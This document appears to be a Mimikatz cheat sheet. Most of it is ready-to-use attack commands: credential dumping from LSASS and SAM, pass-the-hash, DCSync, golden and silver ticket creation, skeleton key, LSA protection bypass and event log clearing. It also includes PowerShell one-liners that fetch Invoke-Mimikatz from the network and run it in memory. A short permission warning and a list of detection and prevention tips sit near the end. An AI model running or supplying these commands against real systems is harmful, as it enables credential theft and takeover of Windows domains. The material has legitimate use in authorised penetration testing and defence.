Mimikatz Cheat Sheet

Overview

Mimikatz is a powerful credential dumping and manipulation tool developed by Benjamin Delpy (@gentilkiwi). It can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory, as well as perform various attacks like pass-the-hash, pass-the-ticket, and golden ticket creation.

⚠️ Warning: Mimikatz is a security testing tool that can be used maliciously. Only use it in environments where you have explicit permission to do so.

Obtaining Mimikatz

Official Repository

GitHub: https://github.com/gentilkiwi/mimikatz
Latest Release: https://github.com/gentilkiwi/mimikatz/releases

Pre-compiled Binaries

mimikatz.exe - 32-bit executable
mimikatz_trunk.zip - Contains both 32-bit and 64-bit executables

Compilation from Source

powershell

git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build

Basic Usage

Running Mimikatz

powershell

# Run directly
mimikatz.exe

# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Elevating Privileges

privilege::debug

Getting Help

help
<module>::
<module>::<command> /?

Exiting Mimikatz

exit

Core Modules and Commands

sekurlsa Module (LSASS Memory Access)

Command	Description
`sekurlsa::logonpasswords`	Extract all logon passwords
`sekurlsa::tickets`	Extract Kerberos tickets
`sekurlsa::ekeys`	Extract Kerberos encryption keys
`sekurlsa::dpapi`	Extract DPAPI master keys
`sekurlsa::credman`	Extract credentials from Windows Credential Manager
`sekurlsa::msv`	Extract MSV authentication information
`sekurlsa::tspkg`	Extract TSPKG authentication information
`sekurlsa::wdigest`	Extract WDigest authentication information
`sekurlsa::kerberos`	Extract Kerberos authentication information
`sekurlsa::ssp`	Extract SSP authentication information
`sekurlsa::livessp`	Extract LiveSSP authentication information
`sekurlsa::cloudap`	Extract CloudAP authentication information

lsadump Module (SAM and Active Directory)

Command	Description
`lsadump::sam`	Extract hashes from the SAM database
`lsadump::secrets`	Extract LSA secrets
`lsadump::cache`	Extract cached domain credentials
`lsadump::dcsync`	Perform DCSync attack to retrieve password data
`lsadump::lsa`	Extract LSA secrets
`lsadump::trust`	Extract domain trust keys
`lsadump::backupkeys`	Extract domain backup keys

kerberos Module (Ticket Manipulation)

Command	Description
`kerberos::list`	List all Kerberos tickets
`kerberos::purge`	Purge all Kerberos tickets
`kerberos::ptt`	Pass-the-ticket (inject a ticket)
`kerberos::golden`	Create a golden ticket
`kerberos::silver`	Create a silver ticket
`kerberos::tgt`	Create a TGT
`kerberos::hash`	Calculate Kerberos keys from password

crypto Module (Cryptographic Operations)

Command	Description
`crypto::certificates`	List certificates
`crypto::keys`	List keys
`crypto::system`	List system certificates
`crypto::capi`	List CAPI certificates
`crypto::cng`	List CNG certificates
`crypto::stores`	List certificate stores

vault Module (Windows Vault Access)

Command	Description
`vault::cred`	List credentials in Windows Vault
`vault::list`	List vault credentials

token Module (Token Manipulation)

Command	Description
`token::whoami`	Display current token information
`token::list`	List all tokens
`token::elevate`	Elevate token privileges
`token::revert`	Revert token
`token::run`	Run a process with a token

privilege Module (Privilege Management)

Command	Description
`privilege::debug`	Enable debug privilege
`privilege::driver`	Load a driver

event Module (Event Log Management)

Command	Description
`event::clear`	Clear event logs
`event::drop`	Drop event logs

ts Module (Terminal Services)

Command	Description
`ts::sessions`	List terminal services sessions
`ts::multirdp`	Enable multiple RDP sessions

misc Module (Miscellaneous)

Command	Description
`misc::cmd`	Command prompt
`misc::regedit`	Registry editor
`misc::taskmgr`	Task manager
`misc::ncroutemon`	Network connection route monitor
`misc::detours`	Detours detection
`misc::skeleton`	Install skeleton key

Common Attack Techniques

Credential Dumping

Extract Logon Passwords

privilege::debug
sekurlsa::logonpasswords

Extract Credentials from SAM

privilege::debug
token::elevate
lsadump::sam

Extract Cached Domain Credentials

privilege::debug
lsadump::cache

Extract from LSASS Dump

# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Pass-the-Hash Attacks

Pass-the-Hash with NTLM

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D

Pass-the-Hash with AES Keys

sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF

Over-Pass-the-Hash (Convert NTLM to Kerberos)

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe

DCSync Attack

Extract NTLM Hashes for All Users

lsadump::dcsync /domain:contoso.local /all

Extract NTLM Hash for Specific User

lsadump::dcsync /domain:contoso.local /user:Administrator

Extract NTLM Hash for KRBTGT (for Golden Ticket)

lsadump::dcsync /domain:contoso.local /user:krbtgt

Kerberos Ticket Attacks

List Kerberos Tickets

kerberos::list

Create a Golden Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi

Create a Silver Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi

Pass-the-Ticket

kerberos::ptt golden.kirbi

Purge Tickets

kerberos::purge

Skeleton Key Attack

privilege::debug
misc::skeleton

Advanced Techniques

DPAPI Master Key Extraction

sekurlsa::dpapi

LSA Protection Bypass

# Load mimikatz driver
mimidrv::service

# Enable debug privilege
privilege::debug

# Load driver
!+

# Remove LSASS protection
!processprotect /process:lsass.exe /remove

# Extract credentials
sekurlsa::logonpasswords

Remote Operations

# Create process dump of LSASS
# Using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Extract Credentials from Windows Credential Manager

vault::cred
vault::list

Extract Domain Backup Keys

lsadump::backupkeys /system:dc01.contoso.local /export

Command Examples with Parameters

sekurlsa::logonpasswords

sekurlsa::logonpasswords [/patch]

sekurlsa::pth

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]

lsadump::dcsync

lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:{object-guid}]
lsadump::dcsync /domain:DOMAIN /all [/csv]

kerberos::golden

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]

kerberos::ptt

kerberos::ptt TICKET_FILE

Defensive Measures

Detection Methods

Monitor for process creation of mimikatz.exe or suspicious processes accessing lsass.exe
Monitor for suspicious LSASS memory access
Monitor for DCSync operations (replication requests from non-DC machines)
Monitor for ticket creation and manipulation
Monitor for privilege escalation

Prevention Methods

Enable LSA Protection (RunAsPPL)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f

Enable Credential Guard (Windows 10/Server 2016+)
Implement Protected Users group

Disable WDigest authentication

reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f

Implement Just Enough Administration (JEA)
Regular password rotation
Limit administrative privileges
Use strong passwords

Mimikatz Cheat Sheet ​

Overview ​

Obtaining Mimikatz ​

Official Repository ​

Pre-compiled Binaries ​

Compilation from Source ​

Basic Usage ​

Running Mimikatz ​

Elevating Privileges ​

Getting Help ​

Exiting Mimikatz ​

Core Modules and Commands ​

sekurlsa Module (LSASS Memory Access) ​

lsadump Module (SAM and Active Directory) ​

kerberos Module (Ticket Manipulation) ​

crypto Module (Cryptographic Operations) ​

vault Module (Windows Vault Access) ​

token Module (Token Manipulation) ​

privilege Module (Privilege Management) ​

event Module (Event Log Management) ​

ts Module (Terminal Services) ​

misc Module (Miscellaneous) ​

Common Attack Techniques ​

Credential Dumping ​

Extract Logon Passwords ​

Extract Credentials from SAM ​

Extract Cached Domain Credentials ​

Extract from LSASS Dump ​

Pass-the-Hash Attacks ​

Pass-the-Hash with NTLM ​

Pass-the-Hash with AES Keys ​

Over-Pass-the-Hash (Convert NTLM to Kerberos) ​

DCSync Attack ​

Extract NTLM Hashes for All Users ​

Extract NTLM Hash for Specific User ​

Extract NTLM Hash for KRBTGT (for Golden Ticket) ​

Kerberos Ticket Attacks ​

List Kerberos Tickets ​

Create a Golden Ticket ​

Create a Silver Ticket ​

Pass-the-Ticket ​

Purge Tickets ​

Skeleton Key Attack ​

Advanced Techniques ​

DPAPI Master Key Extraction ​

LSA Protection Bypass ​

Remote Operations ​

Extract Credentials from Windows Credential Manager ​

Extract Domain Backup Keys ​

Command Examples with Parameters ​

sekurlsa::logonpasswords ​

sekurlsa::pth ​

lsadump::dcsync ​

kerberos::golden ​

kerberos::ptt ​

Defensive Measures ​

Detection Methods ​

Prevention Methods ​

Resources ​